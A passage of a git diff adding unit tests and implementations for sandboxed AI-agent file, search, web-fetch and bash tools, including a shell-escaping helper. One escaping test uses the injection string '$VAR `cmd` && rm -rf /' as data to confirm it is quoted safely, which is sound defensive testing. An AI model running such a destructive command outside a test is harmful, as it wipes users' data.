+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(initialContent: string) {
+  let stored = initialContent;
+  return {
+    workingDirectory: "/sandbox/mono",
+    readFile: vi.fn(async () => stored),
+    writeFile: vi.fn(async (_path: string, content: string) => {
+      stored = content;
+    }),
+    getStored: () => stored,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("editFileTool", () => {
+  it("replaces a unique oldString once and reports the startLine", async () => {
+    const sb = makeSandbox("line one\nold value\nline three");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "old value", newString: "new value" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number; startLine: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(1);
+    expect(result.startLine).toBe(2);
+    expect(sb.getStored()).toBe("line one\nnew value\nline three");
+  });
+
+  it("rejects when oldString === newString (no-op)", async () => {
+    const sb = makeSandbox("anything");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/must be different/);
+  });
+
+  it("rejects when oldString is not in the file", async () => {
+    const sb = makeSandbox("hello world");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "missing", newString: "other" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/not found/);
+  });
+
+  it("rejects ambiguous edits (multiple matches without replaceAll)", async () => {
+    const sb = makeSandbox("foo\nfoo\nbar");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/2 times/);
+  });
+
+  it("replaces all occurrences when replaceAll:true", async () => {
+    const sb = makeSandbox("foo bar foo baz foo");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(3);
+    expect(sb.getStored()).toBe("qux bar qux baz qux");
+  });
+});
diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts
new file mode 100644
index 000000000..3f35d0a71
--- /dev/null
+++ b/lib/agent/tools/__tests__/globTool.test.ts
@@ -0,0 +1,97 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("globTool", () => {
+  it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => {
+    // Two files, newest first (the command run in the sandbox already sorts its own output).
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    const result = (await tool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      count: number;
+      files: Array<{ path: string; size: number; modifiedAt: string }>;
+    };
+    expect(result.success).toBe(true);
+    expect(result.count).toBe(2);
+    expect(result.files[0]?.path).toBe("src/index.ts");
+    expect(result.files[0]?.size).toBe(512);
+    expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO
+  });
+
+  it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never);
+    const cmd = sb.exec.mock.calls[0]?.[0] as string;
+    expect(cmd).not.toContain("-maxdepth");
+  });
+
+  it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    await tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never);
+    expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/);
+  });
+
+  it("returns success:false on non-1 exit codes", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "err",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    const result = (await tool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/exit 2/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts
new file mode 100644
index 000000000..e3545f501
--- /dev/null
+++ b/lib/agent/tools/__tests__/grepTool.test.ts
@@ -0,0 +1,103 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("grepTool", () => {
+  it("parses `file:line:content` output into structured matches", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42:  login();\n/sandbox/mono/src/b.ts:7:login()",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "login", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      matches: Array<{ file: string; line: number; content: string }>;
+      filesWithMatches: number;
+    };
+    expect(result.success).toBe(true);
+    expect(result.matches).toHaveLength(3);
+    expect(result.matches[0]).toEqual({
+      file: "src/a.ts",
+      line: 5,
+      content: "export function login() {",
+    });
+    expect(result.filesWithMatches).toBe(2);
+  });
+
+  it("treats exit code 1 (no matches) as success:true with empty matches", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 1,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "nothing", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; matchCount: number };
+    expect(result.success).toBe(true);
+    expect(result.matchCount).toBe(0);
+  });
+
+  it("returns success:false for real grep errors (non-1 exit)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "",
+        stderr: "grep: invalid regex",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "[", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/invalid regex/);
+  });
+
+  it("passes -i for caseSensitive:false", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, {
+      experimental_context: ctx,
+    } as never);
+    expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i ");
+  });
+});
diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts
new file mode 100644
index 000000000..6d1d27fa3
--- /dev/null
+++ b/lib/agent/tools/__tests__/readFileTool.test.ts
@@ -0,0 +1,89 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(over: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    stat: vi.fn(),
+    readFile: vi.fn(),
+    ...over,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("readFileTool", () => {
+  it("reads a file and returns numbered lines", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "README.md" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; content: string; totalLines: number; path: string };
+    expect(result.success).toBe(true);
+    expect(result.totalLines).toBe(3);
+    expect(result.content).toBe("1: line one\n2: line two\n3: line three");
+    expect(result.path).toBe("README.md");
+  });
+
+  it("honors offset + limit (1-indexed)", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, {
+      experimental_context: ctx,
+    } as never)) as { content: string; startLine: number; endLine: number };
+    expect(result.startLine).toBe(2);
+    // `endLine` is the last line included (1-indexed). With offset=2,limit=2
+    // we read lines 2 + 3 of a 5-line file, so endLine=3.
+    expect(result.endLine).toBe(3);
+    expect(result.content).toBe("2: b\n3: c");
+  });
+
+  it("rejects directories", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/directory/i);
+  });
+
+  it("returns success:false with an error string on stat/readFile failure", async () => {
+    const sb = makeSandbox({
+      stat: vi.fn().mockRejectedValue(new Error("not found")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "missing.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/not found/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts
new file mode 100644
index 000000000..699605129
--- /dev/null
+++ b/lib/agent/tools/__tests__/shellEscape.test.ts
@@ -0,0 +1,20 @@
+import { describe, it, expect } from "vitest";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+describe("shellEscape", () => {
+  it("wraps a plain string in single quotes", () => {
+    expect(shellEscape("hello")).toBe("'hello'");
+  });
+
+  it("escapes embedded single quotes via the standard ' → '\\'' dance", () => {
+    expect(shellEscape("it's")).toBe("'it'\\''s'");
+  });
+
+  it("handles strings with shell metacharacters unchanged inside single quotes", () => {
+    expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'");
+  });
+
+  it("returns just '' for the empty string", () => {
+    expect(shellEscape("")).toBe("''");
+  });
+});
diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts
new file mode 100644
index 000000000..e862f7276
--- /dev/null
+++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts
@@ -0,0 +1,29 @@
+import { describe, it, expect } from "vitest";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const WORKDIR = "/sandbox/mono";
+
+describe("toDisplayPath", () => {
+  it("strips the workingDirectory prefix when the file is inside", () => {
+    expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts");
+  });
+
+  it("returns `.` for the workingDirectory itself", () => {
+    expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe(".");
+  });
+
+  it("keeps an absolute path when it's outside the working directory", () => {
+    expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts");
+  });
+
+  it("resolves a relative input against the working directory", () => {
+    expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx");
+  });
+
+  it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => {
+    // On POSIX, path.resolve treats a backslash as an ordinary character inside a
+    // segment; the helper should still emit forward slashes for paths it keeps absolute.
+    const result = toDisplayPath("/tmp/win\\path", WORKDIR);
+    expect(result.includes("\\")).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts
new file mode 100644
index 000000000..7b5d88c9e
--- /dev/null
+++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts
@@ -0,0 +1,28 @@
+import { describe, it, expect } from "vitest";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+
+describe("todoWriteTool", () => {
+  it("echoes the todos back with a count message", async () => {
+    const todos = [
+      { id: "1", content: "ls the workspace", status: "in_progress" as const },
+      { id: "2", content: "summarize what we found", status: "pending" as const },
+    ];
+    const result = (await todoWriteTool.execute!({ todos }, {} as never)) as {
+      success: boolean;
+      message: string;
+      todos: typeof todos;
+    };
+    expect(result.success).toBe(true);
+    expect(result.message).toBe("Updated task list with 2 items");
+    expect(result.todos).toEqual(todos);
+  });
+
+  it("accepts an empty list", async () => {
+    const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as {
+      success: boolean;
+      message: string;
+    };
+    expect(result.success).toBe(true);
+    expect(result.message).toBe("Updated task list with 0 items");
+  });
+});
diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts
new file mode 100644
index 000000000..47fb75c92
--- /dev/null
+++ b/lib/agent/tools/__tests__/webFetchTool.test.ts
@@ -0,0 +1,96 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("webFetchTool", () => {
+  it("parses body + trailing status code on success", async () => {
+    // stdout = response body, a newline, then the HTTP status ("200") appended via curl -w '%{http_code}'.
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: '{"ok":true}\n200',
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; status: number; body: string; truncated: boolean };
+    expect(result).toEqual({
+      success: true,
+      status: 200,
+      body: '{"ok":true}',
+      truncated: false,
+    });
+  });
+
+  it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 23,
+        stdout: "huge body fragment\n200",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; truncated: boolean };
+    expect(result.success).toBe(true);
+    expect(result.truncated).toBe(true);
+  });
+
+  it("returns success:false on non-0, non-23 curl exit", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 7,
+        stdout: "",
+        stderr: "Failed to connect",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Failed to connect/);
+  });
+
+  it("passes the request body for POST", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "ok\n201",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    await webFetchTool.execute!(
+      { url: "https://example.com/api", method: "POST", body: '{"x":1}' },
+      { experimental_context: ctx } as never,
+    );
+    const cmd = sb.exec.mock.calls[0]?.[0] as string;
+    expect(cmd).toContain("-X POST");
+    expect(cmd).toContain("-d '{\"x\":1}'");
+  });
+});
diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts
new file mode 100644
index 000000000..3656a777c
--- /dev/null
+++ b/lib/agent/tools/__tests__/writeFileTool.test.ts
@@ -0,0 +1,52 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(over: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    mkdir: vi.fn().mockResolvedValue(undefined),
+    writeFile: vi.fn().mockResolvedValue(undefined),
+    stat: vi
+      .fn()
+      .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }),
+    ...over,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("writeFileTool", () => {
+  it("creates parent dirs and writes content via sandbox.writeFile", async () => {
+    const sb = makeSandbox();
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = writeFileTool;
+    const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; path: string; bytesWritten: number };
+    expect(result.success).toBe(true);
+    expect(result.path).toBe("src/index.ts");
+    expect(result.bytesWritten).toBe(42);
+    expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true });
+    expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8");
+  });
+
+  it("returns success:false on sandbox failure", async () => {
+    const sb = makeSandbox({
+      writeFile: vi.fn().mockRejectedValue(new Error("EACCES")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = writeFileTool;
+    const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/EACCES/);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
index 908113812..479a608db 100644
--- a/lib/agent/tools/bashTool.ts
+++ b/lib/agent/tools/bashTool.ts
@@ -21,9 +21,9 @@ const bashInputSchema = z.object({
 });
 
 /**
- * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
- * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
- * working directory.
+ * `bash` sandbox tool. Runs `bash -c "<command>"` inside the agent's
+ * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working
+ * directory.
  *
  * Approval gating is intentionally absent — model-issued commands are
  * trusted in this PR. Add a host-side gate at the route/UI layer if that
@@ -34,9 +34,8 @@ const bashInputSchema = z.object({
  * the right org. Detached execs deliberately skip env injection — those
  * processes outlive the prompt.
  */
-export const bashTool = () =>
-  tool({
-    description: `Execute a bash command in the user's shell (non-interactive).
+export const bashTool = tool({
+  description: `Execute a bash command in the user's shell (non-interactive).
 
 WHEN TO USE:
 - Running existing project commands (build, test, lint, typecheck)
@@ -61,56 +60,56 @@ IMPORTANT:
 - Never use interactive commands (vim, nano, top, bash, ssh, etc.)
 - Always quote file paths that may contain spaces
 - Use detached: true to start dev servers / long-running processes in the background`,
-    inputSchema: bashInputSchema,
-    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
-      const sandbox = await getSandbox(experimental_context, "bash");
-      const workingDirectory = sandbox.workingDirectory;
-      const workingDir = cwd
-        ? path.isAbsolute(cwd)
-          ? cwd
-          : path.resolve(workingDirectory, cwd)
-        : workingDirectory;
+  inputSchema: bashInputSchema,
+  execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+    const sandbox = await getSandbox(experimental_context, "bash");
+    const workingDirectory = sandbox.workingDirectory;
+    const workingDir = cwd
+      ? path.isAbsolute(cwd)
+        ? cwd
+        : path.resolve(workingDirectory, cwd)
+      : workingDirectory;
 
-      if (detached) {
-        if (!sandbox.execDetached) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr:
-              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
-          };
-        }
-        try {
-          const { commandId } = await sandbox.execDetached(command, workingDir);
-          return {
-            success: true,
-            exitCode: null,
-            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
-            stderr: "",
-          };
-        } catch (error) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr: error instanceof Error ? error.message : String(error),
-          };
-        }
+    if (detached) {
+      if (!sandbox.execDetached) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr:
+            "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+        };
       }
+      try {
+        const { commandId } = await sandbox.execDetached(command, workingDir);
+        return {
+          success: true,
+          exitCode: null,
+          stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+          stderr: "",
+        };
+      } catch (error) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr: error instanceof Error ? error.message : String(error),
+        };
+      }
+    }
 
-      const recoupEnv = buildRecoupExecEnv(experimental_context);
-      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
-        signal: abortSignal,
-        ...(recoupEnv ? { env: recoupEnv } : {}),
-      });
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+    const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+      signal: abortSignal,
+      ...(recoupEnv ? { env: recoupEnv } : {}),
+    });
 
-      return {
-        success: result.success,
-        exitCode: result.exitCode,
-        stdout: result.stdout,
-        stderr: result.stderr,
-        ...(result.truncated && { truncated: true }),
-      };
-    },
-  });
+    return {
+      success: result.success,
+      exitCode: result.exitCode,
+      stdout: result.stdout,
+      stderr: result.stderr,
+      ...(result.truncated && { truncated: true }),
+    };
+  },
+});
diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts
new file mode 100644
index 000000000..d8274c0bc
--- /dev/null
+++ b/lib/agent/tools/editFileTool.ts
@@ -0,0 +1,113 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const editInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"),
+  oldString: z.string().describe("The exact text to replace"),
+  newString: z.string().describe("The text to replace it with (must differ from oldString)"),
+  replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"),
+  startLine: z
+    .number()
+    .optional()
+    .describe("Line number where oldString starts (for diff display)"),
+});
+
+/**
+ * `edit` — exact-string replacement inside a sandboxed file. Requires the
+ * model to have already read the file so it can produce a unique
+ * `oldString`. Rejects ambiguous matches unless `replaceAll` is set.
+ *
+ * Returns `{ success: true, path, replacements, startLine }` on success, or
+ * `{ success: false, error, hint? }` when the inputs are rejected or the
+ * sandbox read/write throws. `startLine` in the result is the 1-based line
+ * of the first match, computed from the file content (the `startLine` input
+ * is not read by `execute`).
+ */
+export const editFileTool = tool({
+  description: `Perform exact string replacement in a file.
+
+WHEN TO USE:
+- Making small, precise edits to an existing file you have already read
+- Renaming a variable or identifier consistently within a single file
+- Changing a specific block of code or configuration exactly as seen in the read output
+
+WHEN NOT TO USE:
+- Creating new files (use writeFileTool instead)
+- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool)
+
+USAGE:
+- Use workspace-relative file paths (e.g., "src/auth.ts")
+- You must read the file first with readFileTool in this conversation
+- Provide oldString as the EXACT text to replace, including whitespace and indentation
+- By default, oldString must be UNIQUE in the file; otherwise the edit will fail
+- Use replaceAll: true to change ALL occurrences (e.g., for a rename)
+- ALWAYS provide startLine when known: the line number where oldString begins
+
+IMPORTANT:
+- Preserve exact indentation and spacing from the file's content as returned by readFileTool
+- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString
+- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`,
+  inputSchema: editInputSchema,
+  execute: async (
+    { filePath, oldString, newString, replaceAll = false },
+    { experimental_context },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "edit");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      if (oldString === newString) {
+        return { success: false, error: "oldString and newString must be different" };
+      }
+      // An empty needle "matches" between every character, so it can never
+      // identify a unique edit location — reject it up front.
+      if (oldString === "") {
+        return { success: false, error: "oldString must not be empty" };
+      }
+
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+
+      if (!content.includes(oldString)) {
+        return {
+          success: false,
+          error: "oldString not found in file",
+          hint: "Make sure to match exact whitespace and indentation",
+        };
+      }
+
+      const occurrences = content.split(oldString).length - 1;
+      if (occurrences > 1 && !replaceAll) {
+        return {
+          success: false,
+          error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`,
+        };
+      }
+
+      const matchIndex = content.indexOf(oldString);
+      const startLine = content.slice(0, matchIndex).split("\n").length;
+      // Use replacer functions so `$&`, `$1`, `$$` etc. in newString are
+      // written literally instead of being expanded as replacement patterns.
+      const newContent = replaceAll
+        ? content.replaceAll(oldString, () => newString)
+        : content.replace(oldString, () => newString);
+
+      await sandbox.writeFile(absolutePath, newContent, "utf-8");
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        replacements: replaceAll ? occurrences : 1,
+        startLine,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to edit file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts
new file mode 100644
index 000000000..d1de234d2
--- /dev/null
+++ b/lib/agent/tools/globTool.ts
@@ -0,0 +1,174 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface FileInfo {
+  path: string;
+  size: number;
+  modifiedAt: number;
+}
+
+const globInputSchema = z.object({
+  pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"),
+  path: z
+    .string()
+    .optional()
+    .describe("Workspace-relative base directory to search from (e.g., src)"),
